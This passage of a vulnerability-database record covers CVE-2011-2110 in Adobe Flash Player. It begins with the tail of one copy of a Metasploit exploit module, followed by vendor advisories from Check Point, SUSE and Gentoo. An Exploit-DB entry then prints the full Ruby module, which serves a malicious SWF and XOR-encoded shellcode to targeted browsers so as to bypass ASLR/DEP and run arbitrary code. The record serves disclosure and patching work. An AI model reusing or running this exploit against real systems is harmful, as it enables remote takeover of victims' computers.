Zlib::Deflate.deflate(uri) \n \nuri = \"\" \nbd_uri.each_byte do | c | \nuri << (xor_byte ^ c) \nend \n \nbd_uri = uri.unpack(\"H*\")[0] \n \nobj_id = rand_text_alpha(rand(6)+3) \n \nif request.uri.match(/\\.swf/i) \nprint_status(\"Sending malicious swf\") \nsend_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' }) \nreturn \nend \n \nif request.uri.match(/\\.txt/i) \nprint_status(\"Sending payload\") \nsend_response(cli, shellcode, { 'Content-Type' => 'text/plain' }) \nreturn \nend \n \nhtml = <<-EOS \n<html> \n<head> \n</head> \n<body> \n<center> \n<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" \nid=\"#{obj_id}\" width=\"600\" height=\"400\" \ncodebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\"> \n<param name=\"movie\" value=\"#{get_resource}/#{trigger_file}?info=#{bd_uri}\" /> \n<embed src=\"#{get_resource}/#{trigger_file}?info=#{bd_uri}\" quality=\"high\" \nwidth=\"320\" height=\"300\" name=\"#{obj_id}\" align=\"middle\" \nallowNetworking=\"all\" \ntype=\"application/x-shockwave-flash\" \npluginspage=\"http://www.macromedia.com/go/getflashplayer\"> \n</embed> \n</object> \n</center> \n</body> \n</html> \nEOS \n \nhtml = html.gsub(/^\\t\\t/, '') \n \nprint_status(\"Sending #{self.name} HTML\") \nsend_response(cli, html, { 'Content-Type' => 'text/html' }) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/113921/adobe_flashplayer_arrayindexing.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T12:31:23", "description": "The vulnerability is due to an error when processing ActionScript Rest array in flash files. A remote attacker can exploit this vulnerability by enticing a user to download and view a Flash file that contains a malicious ActionScript code. Successful exploitation of this vulnerability could cause a crash and potentially allow an attacker to take control of the affected system.", "cvss3": {}, "published": "2011-06-22T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player ActionScript Rest Array Memory Corruption (APSB11-18; CVE-2011-2110)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2110"], "modified": "2014-08-14T00:00:00", "id": "CPAI-2011-319", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:08:03", "description": "A critical vulnerability has been identified in Adobe Flash\n Player 10.3.181.23 and earlier versions for Windows,\n Macintosh, Linux and Solaris, and Adobe Flash Player\n 10.3.185.23 and earlier versions for Android. This memory\n corruption vulnerability (CVE-2011-2110) could cause a\n crash and potentially allow an attacker to take control of\n the affected system. There are reports that this\n vulnerability is being exploited in the wild in targeted\n attacks via malicious Web pages.\n", "cvss3": {}, "published": "2011-06-15T17:08:19", "type": "suse", "title": "flash-player (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2011-2110"], "modified": "2011-06-15T17:08:19", "id": "SUSE-SU-2011:0640-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2011-06/msg00005.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:05:42", "description": "A critical vulnerability has been identified in Adobe Flash\n Player 10.3.181.23 and earlier versions for Windows,\n Macintosh, Linux and Solaris, and Adobe Flash Player\n 10.3.185.23 and earlier versions for Android. This memory\n corruption vulnerability (CVE-2011-2110) could cause a\n crash and potentially allow an attacker to take control of\n the affected system. There are reports that this\n vulnerability is being exploited in the wild in targeted\n attacks via malicious Web pages.\n\n", "cvss3": {}, "published": "2011-06-15T15:08:17", "type": "suse", "title": "flash-player: Update to 10.3.181.26 (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2011-2110"], "modified": "2011-06-15T15:08:17", "id": "OPENSUSE-SU-2011:0637-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2011-06/msg00004.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2022-01-13T06:39:54", "description": "", "cvss3": {}, "published": "2012-06-20T00:00:00", "type": "exploitdb", "title": "Adobe Flash Player - AVM Verification Logic Array Indexing Code Execution (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2110", "2011-2110", "2008-4192"], "modified": "2012-06-20T00:00:00", "id": "EDB-ID:19295", "href": "https://www.exploit-db.com/exploits/19295", "sourceData": "##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe Flash Player AVM Verification Logic Array Indexing Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in Adobe Flash Player versions 10.3.181.23\r\n\t\t\t\tand earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification\r\n\t\t\t\tlogic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same\r\n\t\t\t\tvulnerability that was used for attacks against Korean based organizations.\r\n\r\n\t\t\t\t\tSpecifically, this issue occurs when indexing an array using an arbitrary value,\r\n\t\t\t\tmemory can be referenced and later executed. Taking advantage of this issue does not rely\r\n\t\t\t\ton heap spraying as the vulnerability can also be used for information leakage.\r\n\r\n\t\t\t\t\tCurrently this exploit works for IE6, IE7, IE8, Firefox 10.2 and likely several\r\n\t\t\t\tother browsers under multiple Windows platforms. This exploit bypasses ASLR/DEP and\r\n\t\t\t\tis very reliable.\r\n\t\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'mr_me <steventhomasseeley[at]gmail.com>', # msf exploit,\r\n\t\t\t\t\t'Unknown' # malware version seen used in targeted attacks\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2011-2110'],\r\n\t\t\t\t\t['OSVDB', '48268'],\r\n\t\t\t\t\t['URL', 'http://www.adobe.com/devnet/swf.html'],\r\n\t\t\t\t\t['URL', 'http://www.adobe.com/support/security/bulletins/apsb11-18.html'],\r\n\t\t\t\t\t['URL', 'http://www.accessroot.com/arteam/site/download.php?view.331'],\r\n\t\t\t\t\t['URL', 'http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20110617'],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'HTTP::compression' => 'gzip',\r\n\t\t\t\t\t'HTTP::chunked' => true,\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops' => true\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', {}],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jun 21 2012',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t# src for the flash file: external/source/exploits/CVE-2011-2110/CVE-2011-2110.as\r\n\t\t# full aslr/dep bypass using the info leak as per malware\r\n\t\tpath = File.join( Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2011-2110.swf\" )\r\n\t\tfd = File.open( path, \"rb\" )\r\n\t\t@swf = fd.read(fd.stat.size)\r\n\t\tfd.close\r\n\t\tsuper\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\tuse_zlib\r\n\tend\r\n\r\n\tdef get_target(agent)\r\n\t\t#If the user is already specified by the user, we'll just use that\r\n\t\treturn target if target.name != 'Automatic'\r\n\r\n\t\tif agent =~ /MSIE/\r\n\t\t\treturn targets[0] # ie 6/7/8 tested working\r\n\t\telsif agent =~ /Firefox/\r\n\t\t\treturn targets[0] # ff 10.2 tested working\r\n\t\telse\r\n\t\t\treturn nil\r\n\t\tend\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\tagent = request.headers['User-Agent']\r\n\t\tmy_target = get_target(agent)\r\n\r\n\t\t# Avoid the attack if the victim doesn't have the same setup we're targeting\r\n\t\tif my_target.nil?\r\n\t\t\tprint_error(\"#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}\")\r\n\t\t\tsend_not_found(cli)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\txor_byte = 122\r\n\t\ttrigger = @swf\r\n\t\ttrigger_file = rand_text_alpha(rand(6)+3) + \".swf\"\r\n\t\tcode = rand_text_alpha(rand(6)+3) + \".txt\"\r\n\r\n\t\tsc = Zlib::Deflate.deflate(payload.encoded)\r\n\t\tshellcode = \"\"\r\n\r\n\t\tsc.each_byte do | c |\r\n\t\t\tshellcode << (xor_byte ^ c)\r\n\t\tend\r\n\r\n\t\turi = ((datastore['SSL']) ? \"https://\" : \"http://\")\r\n\t\turi << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])\r\n\t\turi << \":#{datastore['SRVPORT']}#{get_resource()}/#{code}\"\r\n\r\n\t\tbd_uri = Zlib::Deflate.deflate(uri)\r\n\r\n\t\turi = \"\"\r\n\t\tbd_uri.each_byte do | c |\r\n\t\t\turi << (xor_byte ^ c)\r\n\t\tend\r\n\r\n\t\tbd_uri = uri.unpack(\"H*\")[0]\r\n\r\n\t\tobj_id = rand_text_alpha(rand(6)+3)\r\n\r\n\t\tif request.uri.match(/\\.swf/i)\r\n\t\t\tprint_status(\"Sending malicious swf\")\r\n\t\t\tsend_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tif request.uri.match(/\\.txt/i)\r\n\t\t\tprint_status(\"Sending payload\")\r\n\t\t\tsend_response(cli, shellcode, { 'Content-Type' => 'text/plain' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\thtml = <<-EOS\r\n\t\t<html>\r\n\t\t<head>\r\n\t\t</head>\r\n\t\t<body>\r\n\t\t<center>\r\n\t\t<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\"\r\n\t\tid=\"#{obj_id}\" width=\"600\" height=\"400\"\r\n\t\tcodebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\">\r\n\t\t<param name=\"movie\" value=\"#{get_resource}/#{trigger_file}?info=#{bd_uri}\" />\r\n\t\t<embed src=\"#{get_resource}/#{trigger_file}?info=#{bd_uri}\" quality=\"high\"\r\n\t\twidth=\"320\" height=\"300\" name=\"#{obj_id}\" align=\"middle\"\r\n\t\tallowNetworking=\"all\"\r\n\t\ttype=\"application/x-shockwave-flash\"\r\n\t\tpluginspage=\"http://www.macromedia.com/go/getflashplayer\">\r\n\t\t</embed>\r\n\t\t</object>\r\n\t\t</center>\r\n\t\t</body>\r\n\t\t</html>\r\n\t\tEOS\r\n\r\n\t\thtml = html.gsub(/^\\t\\t/, '')\r\n\r\n\t\tprint_status(\"Sending #{self.name} HTML\")\r\n\t\tsend_response(cli, html, { 'Content-Type' => 'text/html' })\r\n\tend\r\nend", "sourceHref": "https://www.exploit-db.com/download/19295", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2022-01-17T19:13:28", "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers and Adobe Security Advisories and Bulletins referenced below for details. \n\n### Impact\n\nBy enticing a user to open a specially crafted SWF file a remote attacker could cause a Denial of Service or the execution of arbitrary code with the privileges of the user running the application. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-plugins/adobe-flash-10.3.183.10\"", "cvss3": {}, "published": "2011-10-13T00:00:00", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0558", "CVE-2011-0559", "CVE-2011-0560", "CVE-2011-0561", "CVE-2011-0571", "CVE-2011-0572", "CVE-2011-0573", "CVE-2011-0574", "CVE-2011-0575", "CVE-2011-0577", "CVE-2011-0578", "CVE-2011-0579", "CVE-2011-0589", "CVE-2011-0607", "CVE-2011-0608", "CVE-2011-0609", "CVE-2011-0611", "CVE-2011-0618", "CVE-2011-0619", "CVE-2011-0620", "CVE-2011-0621", "CVE-2011-0622", "CVE-2011-0623", "CVE-2011-0624", "CVE-2011-0625", "CVE-2011-0626", "CVE-2011-0627", "CVE-2011-0628", "CVE-2011-2107", "CVE-2011-2110", "CVE-2011-2125", "CVE-2011-2130", "CVE-2011-2134", "CVE-2011-2135", "CVE-2011-2136", "CVE-2011-2137", "CVE-2011-2138", "CVE-2011-2139", "CVE-2011-2140", "CVE-2011-2414", "CVE-2011-2415", "CVE-2011-2416", "CVE-2011-2417", "CVE-2011-2424", "CVE-2011-2425", "CVE-2011-2426", "CVE-2011-2427", "CVE-2011-2428", "CVE-2011-2429", "CVE-2011-2430", "CVE-2011-2444"], "modified": "2011-10-13T00:00:00", "id": "GLSA-201110-11", "href": "https://security.gentoo.org/glsa/201110-11", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}